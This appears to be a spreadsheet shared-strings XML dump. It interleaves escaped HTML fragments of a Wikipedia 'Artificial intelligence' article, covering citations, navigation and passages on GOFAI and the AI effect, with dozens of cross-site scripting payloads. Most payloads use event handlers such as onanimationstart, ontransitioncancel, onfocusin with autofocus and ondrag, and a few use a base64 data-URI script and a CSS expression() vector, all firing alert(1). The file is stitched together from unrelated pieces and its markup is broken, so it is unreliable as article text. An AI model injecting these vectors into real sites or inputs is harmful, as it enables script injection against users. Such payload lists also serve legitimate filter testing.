    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Data+characteristics+that+determine+classifier+performance&amp;amp;rft.date=2006&amp;amp;rft.aulast=van+der+Walt&amp;amp;rft.aufirst=Christiaan&amp;amp;rft.au=Bernard%2C+Etienne&amp;amp;rft_id=http%3A%2F%2Fwww.patternrecognition.co.za%2Fpublications%2Fcvdwalt_data_characteristics_classifiers.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;progress id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;output style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;canvas style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-327"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-327"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>?param=&lt;data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-moma-343"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-moma_343-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;track onmouseenter="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;img style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;style ondragover=alert(1) contenteditable&gt;drop here&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, ~I.2.4, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;data style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;acronym onload=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;s onmouseup="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;image id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;sup onmousemove="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay controls onpause=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Dreyfus criticized the &lt;a href="/wiki/Necessary_and_sufficient" class="mw-redirect" title="Necessary and sufficient"&gt;necessary &lt;/a&gt; condition of the &lt;a href="/wiki/Physical_symbol_system" title="Physical symbol system"&gt;physical symbol system &lt;/a&gt; hypothesis, which he called the "psychological assumption": "The mind can be viewed as a device operating on bits of information according to formal rules." (&lt;a href="#CITEREFDreyfus1992"&gt;Dreyfus 1992 &lt;/a&gt;, p.&amp;#160;156) </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;col id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;script onpointerleave=alert(1)&gt;XSS&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;embed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;div id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_revolution" class="mw-redirect" title="Scientific revolution"&gt;Scientific revolution &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;keygen id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/keygen&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=49" title="Edit section: The limits of artificial general intelligence"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Neuroevolution" title="Neuroevolution"&gt;Neuroevolution &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tr onbeforecut="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;video onpointerleave=alert(1)&gt;XSS&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onbeforepaste="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onmouseover="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; In&lt;br /&gt; &lt;cite class="citation book"&gt;&lt;a href="/wiki/Solomon_Feferman" title="Solomon Feferman"&gt;Feferman, Solomon &lt;/a&gt;, ed. (1995). &lt;i&gt;Kurt Gödel: Collected Works, Vol. III: Unpublished Essays and Lectures &lt;/i&gt;. Oxford University Press. pp.&amp;#160;304–23. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-19-514722-3" title="Special:BookSources/978-0-19-514722-3"&gt;&lt;bdi&gt;978-0-19-514722-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Kurt+G%C3%B6del%3A+Collected+Works%2C+Vol.+III%3A+Unpublished+Essays+and+Lectures&amp;amp;rft.pages=304-23&amp;amp;rft.pub=Oxford+University+Press&amp;amp;rft.date=1995&amp;amp;rft.isbn=978-0-19-514722-3&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, p.&amp;#160;49 (historical significance) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onpointerout=alert(1)&gt;XSS&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;output onpaste="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;mark id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFTuring1950"&gt;Turing 1950 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;p style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;summary id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;legend onpointerover=alert(1)&gt;XSS&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;wbr draggable="true" ondragleave="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;samp onblur=alert(1) tabindex=1 id=x&gt;&lt;/samp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;details onbeforecopy="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;multicol id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;image onpointerup=alert(1)&gt;XSS&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;canvas id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/canvas&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;IMG STYLE=":expr/**/ession(alert(''))"&gt;</t>
  </si>
  <si>
    <t>&lt;input4 onpointermove=alert(1)&gt;XSS&lt;/input4&gt;</t>
  </si>
  <si>
    <t>&lt;data draggable="true" ondrag="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;frameset draggable="true" ondragstart="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/File:Nuvola_apps_kalzium.svg" class="image"&gt;&lt;img alt="Nuvola apps kalzium.svg" src="//upload.wikimedia.org/wikipedia/commons/thumb/8/8b/Nuvola_apps_kalzium.svg/28px-Nuvola_apps_kalzium.svg.png" decoding="async" width="28" height="28" class="noviewer" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/8/8b/Nuvola_apps_kalzium.svg/42px-Nuvola_apps_kalzium.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/8/8b/Nuvola_apps_kalzium.svg/56px-Nuvola_apps_kalzium.svg.png 2x" data-file-width="128" data-file-height="128" /&gt; &lt;/a&gt; &lt;a href="/wiki/Portal:Science" title="Portal:Science"&gt;Science&amp;#32;portal &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onmouseenter="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;source id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;param id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=How+to+build+complete+creatures+rather+than+isolated+cognitive+simulators&amp;amp;rft.btitle=Architectures+for+Intelligence&amp;amp;rft.place=Hillsdale%2C+NJ&amp;amp;rft.pages=225-239&amp;amp;rft.pub=Lawrence+Erlbaum+Associates&amp;amp;rft.date=1991&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.52.9510&amp;amp;rft.aulast=Brooks&amp;amp;rft.aufirst=R.+A.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEEdelson1991-141"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEEdelson1991_141-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;keygen id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;menuitem style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;div id="right-navigation"&gt;</t>
  </si>
  <si>
    <t>&lt;svg onmouseenter="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;path&gt;&lt;animateMotion onbegin=alert(1) dur="1s" repeatCount="1"&gt;</t>
  </si>
  <si>
    <t>&lt;var onmousedown="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;body draggable="true" ondrag="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-WERBOS1974-241"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-WERBOS1974_241-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Agent_architectures-180"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Agent_architectures_180-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;sub onpaste="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFRussellNorvig2009"&gt;Russell &amp;amp; Norvig 2009 &lt;/a&gt;, 18.12: Learning from Examples: Summary. </t>
  </si>
  <si>
    <t>&lt;blink onpointerleave=alert(1)&gt;XSS&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Malevolent_and_friendly_AI"&gt;Malevolent and friendly AI </t>
  </si>
  <si>
    <t>&lt;em onpointerup=alert(1)&gt;XSS&lt;/em&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-goodfellow2016-247"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-goodfellow2016_247-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-goodfellow2016_247-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;font onmouseout="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Pedro_Domingos" title="Pedro Domingos"&gt;Domingos, Pedro &lt;/a&gt;, "Our Digital Doubles:  AI will serve our species, not control it", &lt;i&gt;&lt;a href="/wiki/Scientific_American" title="Scientific American"&gt;Scientific American &lt;/a&gt; &lt;/i&gt;, vol. 319, no. 3 (September 2018), pp.&amp;#160;88–93. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dl onpointerleave=alert(1)&gt;XSS&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;tt draggable="true" ondragleave="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;dir id=x tabindex=1 onactivate=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpointerleave=alert(1)&gt;XSS&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;ol id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;dt onpointerup=alert(1)&gt;XSS&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When access to digital computers became possible in the mid 1950s, AI research began to explore the possibility that human intelligence could be reduced to symbol manipulation. The research was centered in three institutions: &lt;a href="/wiki/Carnegie_Mellon_University" title="Carnegie Mellon University"&gt;Carnegie Mellon University &lt;/a&gt;, &lt;a href="/wiki/Stanford" class="mw-redirect" title="Stanford"&gt;Stanford &lt;/a&gt; and &lt;a href="/wiki/MIT" class="mw-redirect" title="MIT"&gt;MIT &lt;/a&gt;, and as described below, each one developed its own style of research. &lt;a href="/wiki/John_Haugeland" title="John Haugeland"&gt;John Haugeland &lt;/a&gt; named these symbolic approaches to AI "good old fashioned AI" or "&lt;a href="/wiki/GOFAI" class="mw-redirect" title="GOFAI"&gt;GOFAI &lt;/a&gt;".&lt;sup id="cite_ref-GOFAI_157-0" class="reference"&gt;&lt;a href="#cite_note-GOFAI-157"&gt;&amp;#91;154&amp;#93; &lt;/a&gt; &lt;/sup&gt; During the 1960s, symbolic approaches had achieved great success at simulating high-level "thinking" in small demonstration programs. Approaches based on &lt;a href="/wiki/Cybernetics" title="Cybernetics"&gt;cybernetics &lt;/a&gt; or &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural networks &lt;/a&gt; were abandoned or pushed into the background.&lt;sup id="cite_ref-158" class="reference"&gt;&lt;a href="#cite_note-158"&gt;&amp;#91;155&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;dd onmousedown="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;output style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Discover+Magazine&amp;amp;rft.atitle=Cultivating+Common+Sense+%7C+DiscoverMagazine.com&amp;amp;rft.date=2017&amp;amp;rft_id=http%3A%2F%2Fdiscovermagazine.com%2F2017%2Fapril-2017%2Fcultivating-common-sense&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Observer&amp;amp;rft.atitle=Stephen+Hawking%2C+Elon+Musk%2C+and+Bill+Gates+Warn+About+Artificial+Intelligence&amp;amp;rft.date=2015-08-19&amp;amp;rft_id=http%3A%2F%2Fobserver.com%2F2015%2F08%2Fstephen-hawking-elon-musk-and-bill-gates-warn-about-artificial-intelligence%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;mark draggable="true" ondragenter="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;nav onpointerleave=alert(1)&gt;XSS&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;tr onload=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;frameset id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/frameset&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. Many deep learning systems need to be able to learn chains ten or more causal links in length.&lt;sup id="cite_ref-schmidhuber2015_246-0" class="reference"&gt;&lt;a href="#cite_note-schmidhuber2015-246"&gt;&amp;#91;235&amp;#93; &lt;/a&gt; &lt;/sup&gt; Deep learning has transformed many important subfields of artificial intelligence&lt;sup class="noprint Inline-Template" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Please_clarify" title="Wikipedia:Please clarify"&gt;&lt;span title="The reason for this is unclear. (July 2019)"&gt;why? </t>
  </si>
  <si>
    <t>&lt;aside onkeydown="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="pt-anontalk"&gt;&lt;a href="/wiki/Special:MyTalk" title="Discussion about edits from this IP address [n]" accesskey="n"&gt;Talk &lt;/a&gt; &lt;/li&gt;&lt;li id="pt-anoncontribs"&gt;&lt;a href="/wiki/Special:MyContributions" title="A list of edits made from this IP address [y]" accesskey="y"&gt;Contributions &lt;/a&gt; &lt;/li&gt;&lt;li id="pt-createaccount"&gt;&lt;a href="/w/index.php?title=Special:CreateAccount&amp;amp;returnto=Artificial+intelligence" title="You are encouraged to create an account and log in; however, it is not mandatory"&gt;Create account &lt;/a&gt; &lt;/li&gt;&lt;li id="pt-login"&gt;&lt;a href="/w/index.php?title=Special:UserLogin&amp;amp;returnto=Artificial+intelligence" title="You&amp;#039;re encouraged to log in; however, it&amp;#039;s not mandatory. [o]" accesskey="o"&gt;Log in &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;strong onkeyup="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;nav draggable="true" ondragend="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;multicol draggable="true" ondragend="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;command id=x tabindex=1 onactivate=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;marquee oncopy="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;rb onbeforepaste="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;address onkeydown="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;span id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/span&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;335–363, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nextid oncopy="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/optgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;h3 id="p-views-label"&gt;Views &lt;/h3&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1959) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;legend oncontextmenu="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-408"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-408"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;map onblur=alert(1) tabindex=1 id=x&gt;&lt;/map&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpointerenter=alert(1)&gt;XSS&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Kernel_methods" class="mw-redirect" title="Kernel methods"&gt;kernel methods &lt;/a&gt; such as the &lt;a href="/wiki/Support_vector_machine" class="mw-redirect" title="Support vector machine"&gt;support vector machine &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Knowledge-based </t>
  </si>
  <si>
    <t>Dartmouth proposal:</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;As machines become increasingly capable, tasks considered to require "intelligence" are often removed from the definition of AI, a phenomenon known as the &lt;a href="/wiki/AI_effect" title="AI effect"&gt;AI effect &lt;/a&gt;.&lt;sup id="cite_ref-3" class="reference"&gt;&lt;a href="#cite_note-3"&gt;&amp;#91;3&amp;#93; &lt;/a&gt; &lt;/sup&gt; A quip in Tesler's Theorem says "AI is whatever hasn't been done yet."&lt;sup id="cite_ref-4" class="reference"&gt;&lt;a href="#cite_note-4"&gt;&amp;#91;4&amp;#93; &lt;/a&gt; &lt;/sup&gt; For instance, &lt;a href="/wiki/Optical_character_recognition" title="Optical character recognition"&gt;optical character recognition &lt;/a&gt; is frequently excluded from things considered to be AI&lt;sup id="cite_ref-5" class="reference"&gt;&lt;a href="#cite_note-5"&gt;&amp;#91;5&amp;#93; &lt;/a&gt; &lt;/sup&gt; , having become a routine technology.&lt;sup id="cite_ref-6" class="reference"&gt;&lt;a href="#cite_note-6"&gt;&amp;#91;6&amp;#93; &lt;/a&gt; &lt;/sup&gt; Modern machine capabilities generally classified as AI include successfully &lt;a href="/wiki/Natural_language_understanding" class="mw-redirect" title="Natural language understanding"&gt;understanding human speech &lt;/a&gt;,&lt;sup id="cite_ref-FOOTNOTERussellNorvig2009_7-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig2009-7"&gt;&amp;#91;7&amp;#93; &lt;/a&gt; &lt;/sup&gt; competing at the highest level in &lt;a href="/wiki/Strategic_game" class="mw-redirect" title="Strategic game"&gt;strategic game &lt;/a&gt; systems (such as &lt;a href="/wiki/Chess" title="Chess"&gt;chess &lt;/a&gt; and &lt;a href="/wiki/Go_(game)" title="Go (game)"&gt;Go &lt;/a&gt;),&lt;sup id="cite_ref-bbc-alphago_8-0" class="reference"&gt;&lt;a href="#cite_note-bbc-alphago-8"&gt;&amp;#91;8&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Autonomous_car" class="mw-redirect" title="Autonomous car"&gt;autonomously operating cars &lt;/a&gt;, intelligent routing in &lt;a href="/wiki/Content_delivery_network" title="Content delivery network"&gt;content delivery networks &lt;/a&gt;, and &lt;a href="/wiki/Military_simulations" class="mw-redirect" title="Military simulations"&gt;military simulations &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;iframe onpointerenter=alert(1)&gt;XSS&lt;/iframe&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;ul&gt;&lt;li class="wb-otherproject-link wb-otherproject-commons"&gt;&lt;a href="https://commons.wikimedia.org/wiki/Category:Artificial_intelligence" hreflang="en"&gt;Wikimedia Commons &lt;/a&gt; &lt;/li&gt;&lt;li class="wb-otherproject-link wb-otherproject-wikibooks"&gt;&lt;a href="https://en.wikibooks.org/wiki/Artificial_Intelligence" hreflang="en"&gt;Wikibooks &lt;/a&gt; &lt;/li&gt;&lt;li class="wb-otherproject-link wb-otherproject-wikiquote"&gt;&lt;a href="https://en.wikiquote.org/wiki/Artificial_intelligence" hreflang="en"&gt;Wikiquote &lt;/a&gt; &lt;/li&gt;&lt;li class="wb-otherproject-link wb-otherproject-wikiversity"&gt;&lt;a href="https://en.wikiversity.org/wiki/Portal:Artificial_intelligence" hreflang="en"&gt;Wikiversity &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;br onbeforecopy="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.wired.com/story/ai-has-a-hallucination-problem-thats-proving-tough-to-fix/"&gt;"AI Has a Hallucination Problem That's Proving Tough to Fix" &lt;/a&gt;. &lt;i&gt;WIRED &lt;/i&gt;. 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;12 March </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;center style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; (2nd ed.). Dover. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-486-24864-6" title="Special:BookSources/978-0-486-24864-6"&gt;&lt;bdi&gt;978-0-486-24864-6 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Introduction+to+Artificial+Intelligence&amp;amp;rft.edition=2nd&amp;amp;rft.pub=Dover&amp;amp;rft.date=1985&amp;amp;rft.isbn=978-0-486-24864-6&amp;amp;rft.aulast=Jackson&amp;amp;rft.aufirst=Philip&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fintroductiontoar1985jack&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;param onmousedown="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;image onpointerleave=alert(1)&gt;XSS&lt;/image&gt;</t>
  </si>
  <si>
